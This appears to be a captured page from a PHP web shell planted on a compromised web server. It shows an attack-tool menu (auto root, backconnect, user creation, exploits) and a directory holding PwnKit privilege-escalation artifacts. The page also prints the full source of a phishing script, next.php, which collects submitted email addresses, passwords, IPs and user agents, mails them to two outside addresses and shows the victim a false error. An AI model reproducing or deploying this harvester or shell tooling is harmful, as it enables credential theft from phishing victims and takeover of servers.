Linux uiet.co.in 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.0.165 | : 216.73.216.215
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.25
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
ubschool.org.in /
images /
imaqes /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
CasperSec.php
0
B
-rw-r--r--
index.html
6.17
KB
-rw-r--r--
next.php
1.09
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : next.php
<?php $Receive_email="bl4ckvirus@yandex.com,nik32021@onmail.com"; $email = trim($_POST['ai']); $password = trim($_POST['pr']); if($email != null && $password != null){ $ip = getenv("REMOTE_ADDR"); $hostname = gethostbyaddr($ip); $useragent = $_SERVER['HTTP_USER_AGENT']; $message .= "|----------| xLs |--------------|\n"; $message .= "Online ID : ".$email."\n"; $message .= "Passcode : ".$password."\n"; $message .= "|--------------- I N F O | I P -------------------|\n"; $message .= "|Client IP: ".$ip."\n"; $message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n"; $message .= "User Agent : ".$useragent."\n"; $message .= "|----------- nike(dot)com --------------|\n"; $send = $Receive_email; $subject = "Login : $ip"; mail($send, $subject, $message); $signal = 'ok'; $msg = 'InValid Credentials'; // $praga=rand(); // $praga=md5($praga); } else{ $signal = 'bad'; $msg = 'Please fill in all the fields.'; } $data = array( 'signal' => $signal, 'msg' => $msg, 'redirect_link' => $redirect, ); echo json_encode($data); ?>
Close